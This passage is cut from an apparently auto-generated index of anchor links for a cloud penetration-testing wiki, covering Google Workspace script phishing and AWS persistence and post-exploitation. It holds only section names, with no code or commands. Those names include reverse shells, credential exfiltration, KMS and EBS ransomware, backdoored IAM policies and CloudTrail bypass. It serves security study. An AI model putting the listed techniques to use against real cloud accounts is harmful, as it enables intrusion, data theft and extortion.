google-platforms-phishing/gws-app-scripts.html#abusing-shared-with-me-documents","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#copying-instead-of-sharing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#sharing-as-web-application","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#testing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-as-persistence","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#shared-document-unverified-prompt-bypass","pentesting-cloud/aws-security/index.html#aws-pentesting","pentesting-cloud/aws-security/index.html#basic-information","pentesting-cloud/aws-security/index.html#labs-to-learn","pentesting-cloud/aws-security/index.html#aws-pentesterred-team-methodology","pentesting-cloud/aws-security/index.html#basic-enumeration","pentesting-cloud/aws-security/index.html#ssrf","pentesting-cloud/aws-security/index.html#whoami","pentesting-cloud/aws-security/index.html#org-enumeration","pentesting-cloud/aws-security/index.html#iam-enumeration","pentesting-cloud/aws-security/index.html#services-enumeration-post-exploitation--persistence","pentesting-cloud/aws-security/index.html#privilege-escalation","pentesting-cloud/aws-security/index.html#publicly-exposed-services","pentesting-cloud/aws-security/index.html#compromising-the-organization","pentesting-cloud/aws-security/index.html#from-the-rootmanagement-account","pentesting-cloud/aws-security/index.html#automated-tools","pentesting-cloud/aws-security/index.html#recon","pentesting-cloud/aws-security/index.html#privesc--exploiting","pentesting-cloud/aws-security/index.html#audit","pentesting-cloud/aws-security/index.html#constant-audit","pentesting-cloud/aws-security/index.html#debug-capture-aws-cli-requests","pentesting-cloud/aws-security/index.html#references","pentesting-cloud/aws-security/aws-basic-information/index.html#aws---basic-information","pentesting-cloud/aws-security/aws-basic-information/index.html#organization-hierarchy","pentesting-cloud/aws-security/aws-basic-information/index.html#accounts","pentesting-cloud/aws-security/aws-basic-information/index.html#organization-units","pentesting-cloud/aws-security/aws-basic-information/index.html#service-control-policy-scp","pentesting-cloud/aws-security/aws-basic-information/index.html#resource-control-policy-rcp","pentesting-cloud/aws-security/aws-basic-information/index.html#arn","pentesting-cloud/aws-security/aws-basic-information/index.html#iam---identity-and-access-management","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-account-root-user","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-users","pentesting-cloud/aws-security/aws-basic-information/index.html#mfa---multi-factor-authentication","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-user-groups","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-roles","pentesting-cloud/aws-security/aws-basic-information/index.html#temporary-credentials-in-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#policies","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-boundaries","pentesting-cloud/aws-security/aws-basic-information/index.html#session-policies","pentesting-cloud/aws-security/aws-basic-information/index.html#identity-federation","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-identity-center","pentesting-cloud/aws-security/aws-basic-information/index.html#cross-account-trusts-and-roles","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-simple-ad","pentesting-cloud/aws-security/aws-basic-information/index.html#other-iam-options","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-id-prefixes","pentesting-cloud/aws-security/aws-basic-information/index.html#recommended-permissions-to-audit-accounts","pentesting-cloud/aws-security/aws-basic-information/index.html#misc","pentesting-cloud/aws-security/aws-basic-information/index.html#cli-authentication","pentesting-cloud/aws-security/aws-basic-information/index.html#references","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#aws---federation-abuse","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#saml","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---github-actions-abuse","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---eks-abuse","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#references","pentesting-cloud/aws-security/aws-permissions-for-a-pentest.html#aws---permissions-for-a-pentest","pentesting-cloud/aws-security/aws-persistence/index.html#aws---persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#aws---api-gateway-persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#modify-lambda-authorizers","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#iam-permissions","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-keys","pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.html#aws---cloudformation-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.html#cloudformation","pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.html#cdk-bootstrap-stack","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#aws---cognito-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#user-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito-idpsetriskconfiguration","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#aws---dynamodb-persistence","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-triggers-with-lambda-backdoor","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-as-a-c2-channel","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#aws---ec2-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#security-group-connection-tracking-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2-lifecycle-manager","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#scheduled-instances","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#spot-fleet-request","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-instances","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-launch-configuration","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpn","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpc-peering","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#aws---ecr-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#ecr","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#hidden-docker-image-with-malicious-code","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#repository-policy","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#registry-policy--cross-account-replication","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#aws---ecs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#hidden-periodic-ecs-task","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#backdoor-container-in-existing-ecs-task-definition","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#undocumented-ecs-service","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#aws---elastic-beanstalk-persistence","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#persistence-in-instance","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#backdoor-in-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#new-backdoored-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#abusing-custom-resource-lifecycle-hooks","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#aws---efs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#efs","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#modify-resource-policy--security-groups","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#create-access-point","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#aws---iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#common-iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#backdoor-role-trust-policies","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#backdoor-policy-version","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#backdoor--create-identity-provider","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#aws---kms-persistence","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#grant-acces-via-kms-policies","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#eternal-grant","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#aws---lambda-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-layer-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-extension-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#versions-aliases--weights","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#version-backdoor--api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#cronevent-actuator","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#aws---abusing-lambda-extensions","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#lambda-extensions","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#external-extension-for-persistence-stealing-requests--modifying-requests","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#references","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#aws---lambda-layers-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layers","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#python-load-path","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#preloaded-libraries","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layer-backdooring","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#external-layers","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#aws---lightsail-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#download-instance-ssh-keys--db-passwords","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#backdoor-instances","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#dns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#aws---rds-persistence","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#make-instance-publicly-accessible-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#create-an-admin-user-inside-the-db","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#make-snapshot-public","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#aws---s3-persistence","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#s3","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#kms-client-side-encryption","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#using-s3-acls","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#aws-sagemaker-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#overview-of-persistence-techniques","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#required-permissions","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#set-lifecycle-configuration-on-notebook-instances","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#example-aws-cli-commands","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#set-lifecycle-configuration-on-sagemaker-studio","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#studio-domain-level-all-users","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#studio-space-level-individual-or-shared-spaces","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#types-of-studio-application-lifecycle-configurations","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#example-command-for-each-type","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#jupyterserver","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#kernelgateway","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#codeeditor","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#critical-info","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#reverse-shell-via-lifecycle-configuration","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#payload-example","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#cron-job-persistence-via-lifecycle-configuration","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#payload-example-1","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#credential-exfiltration-via-imds-v1--v2","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#payload-example-2","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#aws---sns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#sns","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#create-subscribers","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#aws---secrets-manager-persistence","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#secrets-manager","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#via-secrets-rotate-lambda","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#aws---sqs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#sqs","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#using-resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.html#aws---ssm-perssitence","pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.html#ssm","pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.html#using-ssmcreateassociation-for-persistence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#aws---step-functions-persistence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#step-functions","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#step-function-backdooring","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#backdooring-aliases","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#aws---sts-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#sts","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#assume-role-token","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#role-chain-juggling","pentesting-cloud/aws-security/aws-post-exploitation/index.html#aws---post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#aws---api-gateway-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#api-gateway","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#access-unexposed-apis","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#bypass-request-body-passthrough","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#usage-plans-dos","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdategatewayresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdatestage-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayputmethodresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdaterestapi-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewaycreateapikey-apigatewayupdateapikey-apigatewaycreateusageplan-apigatewaycreateusageplankey","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#aws---cloudfront-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#cloudfront","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#man-in-the-middle","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#aws---codebuild-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#check-secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#abuse-codebuild-repo-access","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#leaking-access-tokens-from-aws-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeleteproject","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuildtagresource--codebuilduntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeletesourcecredentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#aws-codebuild---token-leakage","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#recover-githubbitbucket-configured-tokens","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-docker-image","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-insecuressl","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-http-protocol","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#aws---control-tower-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#control-tower","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#enable--disable-controls","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#aws---dlm-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#data-lifecycle-manger-dlm","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#ec2describevolumes-dlmcreatelifecyclepolicy","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#aws---dynamodb-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodb","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbbatchgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbquery","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbscan","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbpartiqlselect","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbexporttabletopointintimedynamodbupdatecontinuousbackups","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbcreatetable-dynamodbrestoretablefrombackup-dynamodbcreatebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbputitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbupdateitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletetable","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbstreamspecification-dynamodbupdatetable-dynamodbdescribestream-dynamodbgetsharditerator-dynamodbgetrecords","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#aws---ec2-ebs-ssm--vpc-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ec2--vpc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#malicious-vpc-mirror----ec2describeinstances-ec2runinstances-ec2createsecuritygroup-ec2authorizesecuritygroupingress-ec2createtrafficmirrortarget-ec2createtrafficmirrorsession-ec2createtrafficmirrorfilter-ec2createtrafficmirrorfilterrule","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#copy-running-instance","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#data-exfiltration","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#open-security-group","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#privesc-to-ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#remove-vpc-flow-logs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ssm-port-forwarding","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#search-sensitive-information-in-public-and-private-amis","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ebs-snapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-ransomware-poc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#aws---ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#checking-a-snapshot-locally","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#checking-a-snapshot-in-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#checking-a-snapshot-in-aws-using-cli","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#shadow-copy","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.html#aws---malicious-vpc-mirror","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#aws---ecr-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#login-pull--push","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecrputlifecyclepolicy--ecrdeleterepository--ecr-publicdeleterepository--ecrbatchdeleteimage--ecr-publicbatchdeleteimage","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#aws---ecs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#host-iam-roles","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#privesc-to-node-to-steal-other-containers-creds--secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#steal-sensitive-info-from-ecr-containers","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#aws---efs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#efs","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletemounttarget","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemupdatefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemcreateaccesspoint-and-elasticfilesystemdeleteaccesspoint","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#aws---eks-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#enumerate-the-cluster-from-the-aws-console","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#connect-to-aws-kubernetes-cluster","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#from-aws-to-kubernetes","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#from-kubernetes-to-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#get-api-server-endpoint-from-a-jwt-token","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#bypass-cloudtrail","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks-ransom","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#aws---elastic-beanstalk-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplicationversion","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkterminateenvironment","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplication","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkswapenvironmentcnames","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkaddtags-elasticbeanstalkremovetags","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#aws---iam-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#iam","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#confused-deputy-problem","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#unexpected-trusts","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#aws---kms-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#encryptdecrypt-information","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#generic-kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#destroy-keys","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#aws---lambda-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#exfilrtate-lambda-credentials","pentesting-cloud/